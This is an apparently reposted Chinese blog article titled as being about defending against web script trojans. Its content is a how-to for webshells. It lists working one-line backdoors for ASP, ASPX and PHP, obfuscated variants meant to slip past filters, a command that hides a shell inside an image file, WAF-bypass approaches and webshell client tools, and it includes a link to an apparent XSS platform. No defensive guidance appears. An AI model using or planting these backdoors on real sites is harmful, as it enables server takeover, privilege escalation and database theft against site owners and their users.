这篇文章给大家分享的是有关web安全中脚本木马如何防御的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。
脚本木马的制作原理
webshell就是一种网页后门(web后门)
webshell制作原理 webshell使用技巧 webshell"黑吃黑"
一. webshell制作原理
一句话木马(2010年出来)--> 上传大马进行提权 小马 --> 上传大马进行提权 大马 打包马 脱裤马 执行命令马
GetShell就是拿webshell的动作
1. 一句话木马
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用
asp : <% execute request("value") %> <%eval request ("pass")%> -------------------------------------- sms2056.com/x.asp?value="cmd"
aspx : <%@ Page Language="Jscript"%> <%eval(Request.I tem["pass"]," uns afe");%>
PHP : <?php @eval($_POST['attack']) ?>
2. 工作原理
黑客在注册信息的电子邮箱或个人主页等中插入类似如下代码:
<%eval request ("pass")%>
其中pass
是值,所以你可以更改自己的值,前面的request
就是获取这个值
上述代码现在比较多见,而且字符数少,对表单字数有限制的地方特别的实用
当知道了数据库的URL,就可以利用本地一张网页进行连接得到WebShell(不知道数据库也可以,只要知道一句话木马
的文件被插入到那一个ASP文件里面就可以了)
一句话木马是基于B/S
结构的
3. 一句话木马变形
<?php $_GET['a']($_POST['b']) ?> --------------------------------------- x.php?a=eval&b="cmd"
<%Eval (Request(chr(112)))%> --------------------------------------- aspcms2.0以上会检查脚本中的双引号""",单引号"'"
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("pass"))%>
<% a=%request("gold") %><%eval %a%>
4. 一般WAF绕过方式
函数绕过 编码绕过 可变变量绕过 动态获取参数绕过
5. 一句话图片马的制作
C32下做一句话 打开c32, 把图片放里面,写入一句话保存,退出
cmd下做一句话 copy /b 1.jpg+1.asp 2.jpg
win7下右键图片,在属性 -> 详细信息 -> 版权内插入一句话即可
6. 常见的一句话客户端
中国菜刀 中国砍刀 蚁剑 C刀 lanker一句话客户端 ZV新型PHP一句话木马客户端GUI版 一句话客户端增强版
7. 大马
大马体积比较大,一般50kb以上.功能也多,一般都包含提权命令,磁盘管理,数据库连接接口,执行命令甚至有些以具备自带提权功能和压缩,解压缩网站程序的功能.这种马隐蔽性不好,而大多代码如不加密的话很多杀毒厂商开始追杀此类程序 .
用途 : 提权 打包 脱裤 增删文件
8. 小马
作用主要用户上传大马
二. webshell使用技巧
内容编码 配合解析漏洞 配合文件包含 利用文件名溢出
三. webshell"黑吃黑"
http://xss.fbisb.com/xss.php?do=login
1. 找shell后门
查找后门 查找webshell后门 找到后门地址 反搞wehshell箱子
2. 找一句话客户端后门
查找客户端后门 找到后门地址 反搞wehshell箱子
感谢各位的阅读!关于“web安全中脚本木马如何防御”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,让大家可以学到更多知识,如果觉得文章不错,可以把它分享出去让更多的人看到吧!
原创文章,作者:506227337,如若转载,请注明出处:https://blog.ytso.com/222401.html